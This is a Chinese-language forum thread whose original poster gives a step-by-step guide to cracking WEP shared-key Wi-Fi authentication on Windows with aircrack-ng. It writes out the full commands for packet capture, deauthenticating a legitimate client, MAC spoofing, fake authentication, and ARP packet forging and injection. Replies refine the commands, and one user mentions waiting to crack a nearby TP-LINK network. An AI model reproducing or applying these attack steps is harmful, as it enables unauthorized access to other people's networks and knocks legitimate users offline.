原创 windows 下 破解 wep 共享认证方式

jiuweiljp

呵呵！其实这个也不是我的原创只不过这个论坛没有人发这样的贴子而已

灵感来源 ：Anonymous 发的BackTrack2下破解无线WPA-PSK加密实战

http://forum.anywlan.com/dispbbs.asp?boardID=15&ID=6620&page=2

参考质料：http://www.aircrack-ng.org/doku.php?id=shared_key

前言：-----------个人理解，有所不妥请指正-------------

其实wap-psk 也是一种共享认证方式

不同之处就是wap-psk密码是变化的并且有数据包认证，而wep密码则没有wap-psk这样的特点这样

造成有空可钻了。

在bt2 下本人没有测试根据这个原理我想是可以的

------------------------------------------------------------------------------------------------------------------------

破解前提：wep 环境中必须有一个已经通过认证的客户端（线上必须有人）

环境：windows xp2

使用软件：aircrack-ng-svn-win rev 687

搭建环境提示：不能用开放式的方式认证必须先填写网络特定信息 下为图片

未完待续 请网友不要跟贴 谢谢

jiuweiljp

补充贴
本人发过两个在windows下破解 wep密码的帖子
但是都有缺憾 没能破解128位的加密
今天终于搞定了128位加密，上图一张

主要还是ivs不够，这个花了40分钟 40多万个包才解开的

没有使用PTW attack

jiuweiljp

破解前提

1、安装 CommView 驱动 具体方法可见我的贴

http://forum.anywlan.com/dispbbs.asp?boardID=15&ID=7225&page=3

2、必须知道 对方的 1、使用的通道 2、ap essid 3、ap bssid 4、线上客户端的mac 地址

（以上信息的来源论坛上已经有贴子阐述我就不写了，）

3、在widnows 下 最重要的是将将自己的mac 改为 线上客户端的mac

开始破解

1、点击开始-〉运行 输入 cmd 点击确定 进入aircrack-ng 的目录（该过程本文以后简称 开窗口）

2、输入 start cmd /k airserv-ng -c <通道号> -d "commview.dll|debug"

选择正确的网卡 带 [CommView] 字符的就是了

在该对话框中需要你输入 y

3、输入 start cmd /k airodump-ng --showack --bssid <ap 的bssid> -w <需要存盘的文件名如：capture> --channel <ap 是用的通道号> 127.0.0.1:666

未完待续

jiuweiljp

4、使用deauthenticate 方式强迫客户端下线 这样可获得prga 包

aireplay-ng -0 10 -a <ap的bssid> -c <线上的客户端mac> 127.0.0.1:666

使用 这个命令以后目录下会多出 一个 capture-01-xx-xx-xx-xx-xx-xx.xor的文件

注：xx-xx-xx-xx-xx-xx为 ap 的 bssid 这个就是prga 包了

5、使用 fake authentication

输入 aireplay-ng -1 0 -e <essid> -a <bssid> -y capture-01-xx-xx-xx-xx-xx-xx.xor 127.0.0.1:666

会出现

等到出现下一个画面就ok了！！在中间的过程中屏幕会不停的滚动

为了出现这一个画面我可是费了不少功夫 国外的资料没有介绍 只有些提示

后来将本机的mac 改为 已经认证的客户端的mac 才成功的

未完待续

jiuweiljp

6、fake authentication这个过程成功以后，相信有经验的朋友知道我准备干什么了吧！呵呵

输入 aireplay-ng -5 -h <你的破解网卡的mac> -b <ap的bssid> 127.0.0.1:666

注意这一步别选错了包 因为在这个网络上有相同的两个mac 有可能选到另外一个客户端的包

成功以后出现

记住这个 fragment-xxxx-xxxxxx.xor文件下一步要用它

7、输入 packetforge-ng -0 -a <ap的bssid> -h <你的破解网卡的mac> -k 255.255.255.255 -l 255.255.255.255 -y fragment-xxxx-xxxxxx.xor -w arp

回答y就可以了

8、回到 airodump-ng 屏幕 你会发现 data 数字在不断增加，

9、等到 数字增加到 一定数量后 64位在widows 20000个基本上购了，128位在windows 下 我目前破解不开

国外的论坛说有可能需要 150万（天啦这要多长时间呀！呵呵）

结果出来了！怎么用可以看我的第一贴 记得要将mac 改回来哟！不然这个网络将会有些问题
破解完了以后 经我测试那个正常的客户端会很慢，基本上不能通讯

后言------

使用bt2的朋友可以将我这个办法试试相信会成功的！！好运！！

以上有什么不正确的地方请指正！谢谢

刚刚看到 斑竹 送了20金币 ！！555555555没有ap可以送！！哈哈

zero

要送AP，你得把你的文章整理整理，通俗易懂，然后发给tange，论坛奖励贴指定的EMAIL地址。

[em01]

fwfw5ff

学习中,感谢楼主!辛苦了.

longas

jiuweiljp，以后也请继续支持论坛！!

不过下次不要请看清再注明“灵感来源 ：Anonymous 发的BackTrack2下破解无线WPA-PSK加密实战”

........我不叫Anonymous[em16]

snake9999

楼主的步骤应该是正确的，可以破解！不过要指出你其中的一条关键命令错误和条件没有说明：

第4步中、使用deauthenticate 方式强迫客户端下线 这样可获得prga 包！
aireplay-ng -0 10 -a <ap的bssid> -c <线上的客户端mac> 127.0.0.1:666
使用 这个命令以后目录下会多出 一个 capture-01-xx-xx-xx-xx-xx-xx.xor的文件！

方法是就是这样，强迫合法客户端下线又连！但是命令错了！

完整的我们还应该加-h <你网卡的MAC>，是啊？有人要问我们的MAC不是改为了合法客户端的MAC，也就是和他一样的MAC了吗？对，问题就出来，条件也引出来了，所以我们需要另外一张网卡或者是另外一台客户端来获取capture-01-xx-xx-xx-xx-xx-xx.xor的文件！

aireplay-ng -0 10 -a <ap的bssid> -c <线上的客户端mac> -h <另外一网卡的MAC> 127.0.0.1:666

这样命令就成功了，等待吧！

如果是楼主说的：

aireplay-ng -0 10 -a <ap的bssid> -c <线上的客户端mac> 127.0.0.1:666
会提示你缺少-y和原mac

aireplay-ng -0 10 -a <ap的bssid> -c <线上的客户端mac> -h <网卡改后MAC> 127.0.0.1:666

其中线上的客户端mac = 网卡改后MAC

我运行了50次都没有生成capture-01-xx-xx-xx-xx-xx-xx.xor 文件！！！！！

我说的可能也有错。。。。希望其他朋友在补充补充！

jiuweiljp

QUOTE:

以下是引用longas在2007-12-9 1:36:11的发言：
jiuweiljp，以后也请继续支持论坛！!

不过下次不要请看清再注明“灵感来源 ：Anonymous 发的BackTrack2下破解无线WPA-PSK加密实战”

........我不叫Anonymous

Sorry Sorry longas我错了下次不敢了！！呵呵

还有 snake9999
我测试在第4步中使用 airodump-ng 除了用wep共享认证方试以外，其他的 wep开放、WPA-tkip、WPA-aes-ccmp、WPA2-tkip、WPA2-aes-ccmp都不会产生 capture-01-xx-xx-xx-xx-xx-xx.xor 这个文件，希望大家共同
探讨。


最后需要说明的是：wep共享模式在实际使用的非常少见，毕竟从安全性和方便性来说它他没有wpa方便、安全
，写这个贴子没有什么实用价值，只是在技术上探讨探讨！！
还有，今天做了试验、在windows下 可以正常用字典破解 WPA-tkip、WPA-aes-ccmp、WPA2-tkip、WPA2-aes-ccmp

snake9999

楼主我等了2周了，都没发现有合法的客户端连接我要破的那个共享认证TP-LINK网络！等得郁闷啊！

上面的关于第4步中，aireplay-ng -0 10 -a <ap的bssid> -c <线上的客户端mac> -h <网卡改后MAC> 127.0.0.1:666试验了，还是能生成capture-01-xx-xx-xx-xx-xx-xx.xor 文件！但没有试验破解过程！

我补充的aireplay-ng -0 10 -a <ap的bssid> -c <线上的客户端mac> -h <自己的网卡MAC> 127.0.0.1:666，加了-h <自己的网卡MAC> 一次就破了试验的共享认证AP！嘿嘿！而且不用把自己的网卡也改为合法客户端MAC一样的地址！

jiuweiljp

其实不需修改自己的mac 地址也可以生成capture-01-xx-xx-xx-xx-xx-xx.xor 这个文件

主要是在下一步 fake authentication （aireplay-ng -1 0 -e <essid> -a <bssid> -y capture-01-xx-xx-xx-xx-xx-xx.xor 127.0.0.1:666）

利用这个生成文件的时候，如果没有变更自己的mac，这一步在我这里无法成功！

我找时间再详细测试一下！！

snake9999 看来你也对共享认证方式很感兴趣！

这几天我主要在国外的论坛上溜达，根据目前的资料来看好像无法破解没有客户端的共享认证的密码！！！！